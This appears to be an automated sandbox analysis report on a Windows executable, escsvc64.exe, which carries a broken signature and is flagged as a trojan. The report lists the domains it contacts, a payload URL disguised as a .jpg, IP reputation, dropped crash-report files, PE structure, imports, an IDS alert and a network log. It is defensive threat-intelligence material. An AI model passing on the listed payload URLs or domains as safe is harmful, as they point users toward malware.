  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
escsvc64.exe7%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.dssdhome.xyz/0%Avira URL Cloudsafe
https://www.dssdhome.xyz/11/xin/escsvc64.jpg0%Avira URL Cloudsafe
https://www.dssdhome.xyz/11/xin/escsvc64.jpg.0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
mooscc.b-cdn.net
169.150.247.36
truefalse
    unknown
    www.dssdhome.xyz
    unknown
    unknowntrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://www.dssdhome.xyz/11/xin/escsvc64.jpgfalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://upx.sf.netAmcache.hve.3.drfalse
        high
        https://www.dssdhome.xyz/escsvc64.exe, 00000000.00000002.1859925957.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004C5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.vescsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://www.dssdhome.xyz/11/xin/escsvc64.jpg.escsvc64.exe, 00000000.00000002.1859925957.00000000004EB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          169.150.247.36
          mooscc.b-cdn.netUnited States
          2711SPIRITTEL-ASUSfalse
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1590615
          Start date and time:2025-01-14 11:20:05 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 37s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:escsvc64.exe
          Detection:MAL
          Classification:mal52.troj.winEXE@2/5@1/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 13
          • Number of non-executed functions: 78
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.190.159.2, 4.175.87.197, 20.109.210.53, 13.107.246.45
          • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          TimeTypeDescription
          05:21:00API Interceptor1x Sleep call for process: escsvc64.exe modified
          05:21:14API Interceptor1x Sleep call for process: WerFault.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          169.150.247.36https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousUnknownBrowse
          • security1.b-cdn.net/
          https://softworldinc.wpengine.comGet hashmaliciousUnknownBrowse
          • cdn.rawgit.com/michalsnik/aos/2.1.1/dist/aos.js
          http://office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.netGet hashmaliciousUnknownBrowse
          • office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.net/favicon.ico
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          mooscc.b-cdn.netEBAbsk8ydv.exeGet hashmaliciousUnknownBrowse
          • 169.150.247.37
          EBAbsk8ydv.exeGet hashmaliciousUnknownBrowse
          • 169.150.247.38
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          SPIRITTEL-ASUSAbsa Remittance Advice.docxGet hashmaliciousUnknownBrowse
          • 169.150.255.184
          https://ipfs.fleek.co/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/Get hashmaliciousUnknownBrowse
          • 169.150.247.39
          https://ipfs.io/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/Get hashmaliciousUnknownBrowse
          • 169.150.247.36
          https://fleek.ipfs.io/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/Get hashmaliciousUnknownBrowse
          • 169.150.247.38
          http://id1223.adsalliance.xyzGet hashmaliciousUnknownBrowse
          • 169.150.252.209
          DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
          • 169.150.236.104
          DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
          • 169.150.247.36
          https://lttechnologies12.com/a/default/Get hashmaliciousUnknownBrowse
          • 169.150.236.104
          https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
          • 169.150.236.105
          http://atozpdfbooks.comGet hashmaliciousUnknownBrowse
          • 169.150.255.183
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousLummaCBrowse
          • 169.150.247.36
          random.exeGet hashmaliciousLummaCBrowse
          • 169.150.247.36
          yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
          • 169.150.247.36
          XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
          • 169.150.247.36
          k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
          • 169.150.247.36
          G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
          • 169.150.247.36
          92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
          • 169.150.247.36
          8e8JUOzOjR.exeGet hashmaliciousDBatLoaderBrowse
          • 169.150.247.36
          UTstKgkJNY.exeGet hashmaliciousDBatLoaderBrowse
          • 169.150.247.36
          On9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
          • 169.150.247.36
          No context
          Process:C:\Windows\System32\WerFault.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.9388373489905867
          Encrypted:false
          SSDEEP:96:2z4yLFBbkh6os0A1+i4nuQXIDcQfc6K/cEScw3Q+HbHg/8BRTf3o8Fa9KLnNFhO7:c7LLbkh6o/0x2INjQT3zuiFZZ24lO8g
          MD5:0A19980AC7FF281250E2FC7231A6655A
          SHA1:DBD2EC9B5FFFDEC38F512A269EF48D3453832FAC
          SHA-256:5896B16D7B5887B3CC0A2974B18CEC145CDD976E9D906DAFCC86A377EF7D1054
          SHA-512:40078A52658D7119B2F2C5D58FC33458C59B26B3E583A51DF6A17864DF034628365D78D4EE8DBBAED94F06C65092099BA7F0F68150D2486432616D8ED76CEB7D
          Malicious:true
          Reputation:low
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.2.3.6.6.0.8.1.2.6.2.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.2.3.6.6.1.2.0.3.2.4.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.1.a.7.8.1.b.-.d.d.b.c.-.4.3.5.f.-.b.8.4.9.-.a.3.8.3.4.4.7.a.5.8.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.3.6.7.c.8.3.-.9.f.f.2.-.4.0.3.0.-.a.7.5.8.-.0.d.6.2.0.5.6.8.d.1.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.s.c.s.v.c.6.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.s.c.S.v.c.6.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.0.-.0.0.0.1.-.0.0.1.4.-.f.b.8.f.-.b.9.0.0.6.e.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.7.e.7.5.6.0.5.1.d.b.7.7.3.8.a.6.a.c.3.f.6.4.d.c.8.0.e.2.9.0.0.0.0.0.0.0.0.0.!.0.0.0.0.e.0.e.3.0.f.4.9.e.8.2.5.0.5.c.a.f.9.e.7.8.5.2.a.1.0.7.1.b.b.c.e.8.1.d.8.f.c.d.c.!.e.s.c.s.v.c.6.4...e.x.e.
          Process:C:\Windows\System32\WerFault.exe
          File Type:Mini DuMP crash report, 16 streams, Tue Jan 14 10:21:00 2025, 0x1205a4 type
          Category:dropped
          Size (bytes):114470
          Entropy (8bit):2.0762185889942404
          Encrypted:false
          SSDEEP:384:z509BHSJJTN/K49OBksMYhLEndFAFFEx7ooyrea2KwoHXnc9bKGZ:y9lSDTVF9OBk4hLEjx7ooePLSe
          MD5:34F8FAC8E7D3C2D629E2F2BCC3E942BD
          SHA1:105454001BD983A57109CE3FED443A573D003C02
          SHA-256:90E37D3A88F2541F2F6146BB3587BA250F606ACEB89B38D1565CED498C30B711
          SHA-512:650DDF783943F8C2A510BF6388ED797D33E33026BD7916C8682E207F10CFADD79E2B9869FA73CFC4F77FF531A70F0E90035C721F6B97B2954045A6D3398D1A08
          Malicious:false
          Reputation:low
          Preview:MDMP..a..... ........:.g............$...........D...D.......$............................X..........l.......8...........T............5..............8/..........$1..............................................................................eJ.......1......Lw......................T............:.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\WerFault.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):8714
          Entropy (8bit):3.7012212286252932
          Encrypted:false
          SSDEEP:192:R6l7wVeJfk9m6Dt6Y9NBIgmfNuprp89bIAEfSQYm:R6lXJ8/Dt6YXBIgmfNtIrfS2
          MD5:5D799804E6A93E6F51BD1B939A1D5705
          SHA1:F4C359E408B12CB4A9041E325C469A7434E90AE4
          SHA-256:FDB03CAA70FF9326EC1E043387AAA8A5D4E23686528F73A3B7FE5C448F8BAFBA
          SHA-512:892725033F130F8A771775202FD15E265CD86DF9E7AF2D876FCD72CEE124045CFBD7F9864D1E7A4381DB7D4AEADB8C473D4BA57ECD579FC75D09F93377346B2A
          Malicious:false
          Reputation:low
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.0.<./.P.i.
          Process:C:\Windows\System32\WerFault.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4690
          Entropy (8bit):4.43840393174553
          Encrypted:false
          SSDEEP:48:cvIwWl8zsBJg771I9z4WpW8VYcEYm8M4JnUFqyq85bWpWrrkIJDwMdd:uIjfTI7Ax7V1JzXpWrrkYLdd
          MD5:18018D70DAE4CC15C2B6D0116530624B
          SHA1:92498F970ECF43CF09F20E0407D60B1A32E5ECBB
          SHA-256:FAB8A16E9CABD519EF18D4F1A7A6DDA757C616863BDC2864D4112B261C2101BD
          SHA-512:912030CFA76EE3943C04B379B5BB127B9874B2B337645D12A27FD8D4BA3EB9BCB862C77A8EE7413D239C4E1D8432B626B50F6CEAA18D04042205FB4C417C8772
          Malicious:false
          Reputation:low
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675443" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
          Process:C:\Windows\System32\WerFault.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):1835008
          Entropy (8bit):4.465647517326975
          Encrypted:false
          SSDEEP:6144:yIXfpi67eLPU9skLmb0b4LWSPKaJG8nAgejZMMhA2gX4WABl0uNFdwBCswSbg:3XD94LWlLZMM6YFHH+g
          MD5:ACC61E01842FEDC77AEFDD703E299DE3
          SHA1:7120F9B07D2CC948D89513EB5E569FAB53471D3D
          SHA-256:3463AEFA1058A50912DA9DB16960AD6940C185247995017EB81941C9185123F5
          SHA-512:5207B03CDFC7042EAB0C3F2475193874904E73F2BEBA270FC9B81287C707E29D27A3387C8DC3421EE6F01608B3D87710DFD5FB9F1E65D3600F540061F33C7CEC
          Malicious:false
          Reputation:low
          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmzt8.nf................................................................................................................................................................................................................................................................................................................................................/6........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          File type:PE32+ executable (GUI) x86-64, for MS Windows
          Entropy (8bit):5.960564454003527
          TrID:
          • Win64 Executable GUI (202006/5) 92.65%
          • Win64 Executable (generic) (12005/4) 5.51%
          • Generic Win/DOS Executable (2004/3) 0.92%
          • DOS Executable Generic (2002/1) 0.92%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:escsvc64.exe
          File size:144'560 bytes
          MD5:525ea9523a2afe76d2eaebc4a6b923eb
          SHA1:e0e30f49e82505caf9e7852a1071bbce81d8fcdc
          SHA256:53c772ca6258ee6a1d53be5e66554d0793f92c631760f1e3ed31366ef4fccba7
          SHA512:3e2e521881f044adf82f380ed10d7eb217ec252a33f9cb146249e6bf8d5aabc2934f3ac67b0bc0fab431dbcb18e153632896c3b63358c27d9233485f14cbd61c
          SSDEEP:3072:L507+DpnZ7olJZm4AyU0Rc4OSSIfO0mZxQeUF53Gbph1s27T:u72zMnQ4gWc4btfO02xi/Gbph1R7T
          TLSH:7CE3C492621044A4F75A47349952E5D597A57C3807E4E3CFE238BE362E322D36E3B24F
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.B..g,N.g,N.g,N:.QN.g,N:.BN6g,N:.WN.g,N.g-N.g,N:.AN{g,N:.^N.g,N:.PN.g,N:.TN.g,NRich.g,N........PE..d......O..........#........
          Icon Hash:8a80809292808001
          Entrypoint:0x140003580
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x140000000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:TERMINAL_SERVER_AWARE
          Time Stamp:0x4FB4DD14 [Thu May 17 11:12:20 2012 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:90807f1f3b7b31817516f1c58a60288f
          Signature Valid:false
          Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
          Signature Validation Error:The digital signature of the object did not verify
          Error Number:-2146869232
          Not Before, Not After
          • 13/07/2011 01:00:00 13/07/2012 00:59:59
          Subject Chain
          • CN=SEIKO EPSON Corporation, OU=Information Service & Support Department, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=SEIKO EPSON Corporation, L=Suwa-shi, S=Nagano, C=JP
          Version:3
          Thumbprint MD5:CA608B34C5C7033C02C006EFF7FC9775
          Thumbprint SHA-1:FBE1BDFDB27AA07A4EBE3E97A22F07BC6C70250F
          Thumbprint SHA-256:507DFC2E866302C1089DB07CDBCEE0AD034A3F8A335DA0DDA1AD508E26436A9A
          Serial:7524DBFE413001B3B345768A4F60DF46
          Instruction
          dec eax
          sub esp, 28h
          call 00007F5FFC4D2FCCh
          dec eax
          add esp, 28h
          jmp 00007F5FFC4CDA03h
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          inc eax
          push ebx
          dec eax
          sub esp, 20h
          mov edx, 00000008h
          lea ecx, dword ptr [edx+18h]
          call 00007F5FFC4D3182h
          dec eax
          mov ecx, eax
          dec eax
          mov ebx, eax
          call 00007F5FFC4D04C7h
          dec eax
          test ebx, ebx
          dec eax
          mov dword ptr [00015190h], eax
          dec eax
          mov dword ptr [00015181h], eax
          jne 00007F5FFC4CDCFBh
          lea eax, dword ptr [ebx+18h]
          dec eax
          add esp, 20h
          pop ebx
          ret
          dec eax
          mov dword ptr [ebx], 00000000h
          xor eax, eax
          dec eax
          add esp, 20h
          pop ebx
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          dec eax
          mov dword ptr [esp+08h], ebx
          dec eax
          mov dword ptr [esp+10h], esi
          dec eax
          mov dword ptr [esp+18h], edi
          inc ecx
          push esp
          inc ecx
          push ebp
          inc ecx
          push esi
          dec eax
          sub esp, 20h
          dec eax
          mov ebx, ecx
          call 00007F5FFC4D1504h
          nop
          dec eax
          mov ecx, dword ptr [0001513Fh]
          call 00007F5FFC4D0627h
          dec esp
          mov ebp, eax
          dec eax
          mov ecx, dword ptr [00015128h]
          call 00007F5FFC4D0618h
          dec eax
          mov esi, eax
          dec ecx
          cmp eax, ebp
          jc 00007F5FFC4CDD8Ch
          dec eax
          mov edi, eax
          dec ecx
          sub edi, ebp
          dec esp
          lea esi, dword ptr [edi+08h]
          dec ecx
          cmp esi, 08h
          Programming Language:
          • [ASM] VS2005 build 50727
          • [C++] VS2005 build 50727
          • [IMP] VS2005 build 50727
          • [ C ] VS2005 build 50727
          • [RES] VS2005 build 50727
          • [LNK] VS2005 build 50727
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x137180xa0.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000xc390.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x190000xf9c.pdata
          IMAGE_DIRECTORY_ENTRY_SECURITY0x218000x1cb0.rsrc
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x104500x1c.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x100000x3d8.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xe4000xe400312b0cc7903c77314065737aa0b6f840False0.5623629385964912data6.434210349442922IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x100000x44340x46000c1cbce9edc1dd89be5cc3a37d2c98ebFalse0.382421875data5.262140167496945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x150000x37800x160029743b577f64cf1dd6827d8241e7bc32False0.16459517045454544data1.9076248479232016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .pdata0x190000xf9c0x1000dcbd733158aa416708b06ffa52c15e3eFalse0.477783203125data4.8653578721712645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x1a0000xc3900xc400933c8a2922c9e09da0bbdc4dcc5f3b3fFalse0.134765625data4.424711281922116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_ICON0x1a4300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.14650537634408603
          RT_ICON0x1a7180x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.30405405405405406
          RT_ICON0x1a8400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3070362473347548
          RT_ICON0x1b6e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4842057761732852
          RT_ICON0x1bf900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.3670520231213873
          RT_ICON0x1c4f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1087136929460581
          RT_ICON0x1eaa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.23170731707317074
          RT_ICON0x1fb480x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.3599290780141844
          RT_ICON0x1ffb00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.14650537634408603
          RT_ICON0x202980x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.30405405405405406
          RT_ICON0x203c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3070362473347548
          RT_ICON0x212680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4842057761732852
          RT_ICON0x21b100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.3670520231213873
          RT_ICON0x220780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1087136929460581
          RT_ICON0x246200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.23170731707317074
          RT_ICON0x256c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.3599290780141844
          RT_GROUP_ICON0x25b300x76dataEnglishUnited States0.6440677966101694
          RT_GROUP_ICON0x25ba80x76dataEnglishUnited States0.6610169491525424
          RT_VERSION0x25c200x2f8dataEnglishUnited States0.4631578947368421
          RT_MANIFEST0x25f180x475ASCII text, with CRLF line terminatorsEnglishUnited States0.4539877300613497
          DLLImport
          KERNEL32.dllCreateFileA, lstrcmpW, WaitForSingleObject, OpenProcess, lstrcmpiW, lstrcpynW, Sleep, GetTickCount, GetModuleFileNameW, CloseHandle, WaitForMultipleObjects, CreateEventW, SetEvent, GetLastError, LocalFree, GetCommandLineW, lstrlenW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, HeapReAlloc, InitializeCriticalSection, LoadLibraryA, SetEnvironmentVariableW, SetEnvironmentVariableA, CompareStringW, CompareStringA, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlCaptureContext, RtlVirtualUnwind, RtlLookupFunctionEntry, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, GetProcAddress, FlsGetValue, FlsSetValue, TlsFree, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, MultiByteToWideChar, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, ExitProcess, RtlUnwindEx, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, WriteFile, GetStdHandle, GetModuleFileNameA, GetCommandLineA, SetHandleCount, GetFileType, GetStartupInfoA, HeapSetInformation, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers
          USER32.dllUnregisterDeviceNotification, RegisterDeviceNotificationW
          ADVAPI32.dllStartServiceCtrlDispatcherW, RegQueryValueExW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, DeleteService, QueryServiceStatus, ControlService, QueryServiceStatusEx, StartServiceW, OpenServiceW, CloseServiceHandle, CreateServiceW, OpenSCManagerW, SetServiceStatus, RegisterServiceCtrlHandlerExW
          SHELL32.dllCommandLineToArgvW, SHGetFolderPathW
          ole32.dllCoCreateInstance, FreePropVariantArray, CoInitialize, CoUninitialize
          OLEAUT32.dllSysFreeString, SysAllocString
          PSAPI.DLLEnumProcesses, EnumProcessModules, GetModuleBaseNameW
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2025-01-14T11:21:00.415789+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733169.150.247.36443TCP
          TimestampSource PortDest PortSource IPDest IP
          Jan 14, 2025 11:20:59.643156052 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:20:59.643202066 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:20:59.643285036 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:20:59.645196915 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:20:59.645212889 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.415667057 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.415788889 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.419940948 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.419951916 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.420274019 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.470489979 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.546308994 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.587341070 CET44349733169.150.247.36192.168.2.4
